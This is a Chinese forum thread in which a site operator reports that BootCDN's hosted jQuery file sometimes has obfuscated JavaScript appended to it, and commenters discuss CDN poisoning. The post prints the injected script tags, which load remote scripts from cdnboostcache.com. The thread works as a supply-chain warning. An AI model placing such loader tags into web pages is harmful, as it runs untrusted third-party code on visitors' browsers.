今天巡查的时候发现网站被加入许多无意义的外链。
追查发现在访问 https://cdn.bootcdn.net/ajax/libs/jquery/1.10.2/jquery.min.js 的时候,
会随机在尾部拼接一段加密的 js 代码,需要多次访问复现,也可能做了其他展示条件。
这段加密会继续引用 https://www.cdnboostcache.com/sdk.html?s=b 页面。
主要内容为:
<script>document.writeln("<script src=\'https://www.cdnboostcache.com/sdk16.1.0.js?version="+zyt+"\'><\/script>");</script>
<script src="https://www.cdnboostcache.com/you.js?version=33"></script>
似乎是一些刷流量的功能,当然这种功能随便它来修改,也许晚上就是跳转色情广告。
当然提供免费 cdn 加速服务的是感谢的,但是如果是做这种违法的事情,那无非也就是利益驱使。
各位引用此 cdn 服务的需要多加注意。
追查发现在访问 https://cdn.bootcdn.net/ajax/libs/jquery/1.10.2/jquery.min.js 的时候,
会随机在尾部拼接一段加密的 js 代码,需要多次访问复现,也可能做了其他展示条件。
这段加密会继续引用 https://www.cdnboostcache.com/sdk.html?s=b 页面。
主要内容为:
<script>document.writeln("<script src=\'https://www.cdnboostcache.com/sdk16.1.0.js?version="+zyt+"\'><\/script>");</script>
<script src="https://www.cdnboostcache.com/you.js?version=33"></script>
似乎是一些刷流量的功能,当然这种功能随便它来修改,也许晚上就是跳转色情广告。
当然提供免费 cdn 加速服务的是感谢的,但是如果是做这种违法的事情,那无非也就是利益驱使。
各位引用此 cdn 服务的需要多加注意。
 |
1
chen2016 5 天前
这种 cdn 要是投毒,盈利空间太大了,无良公司才不在乎你个别人用不用
|
 |
2
greatpp OP @chen2016 是的,最主要的,如果在不注意的时间跳转色情网站或者诈骗之类的被管局抓到,那实际网站运营者会有大麻烦,可不是说不知情就能过去的,就像一颗定时炸弹。
|
 |
3
clarkethan 5 天前
国内公司搞的这种东西,还是得注意下
|
 |
4
Mogugugugu 5 天前  1
直接 Google BootCDN 投毒,这个黑历史也太多了,还敢用的只能说心大活该。。。
|
 |
6
dfkjgklfdjg 4 天前 1
bootCDN 和 51la 居然还没有上大家的黑名单吗?
|
 |
7
GuguDan 4 天前
这两天字节的 cdn 也 404 了,所以还有国内可用的免费 cdn 推荐吗
|
 |
8
AhECbt 4 天前
|
Select Language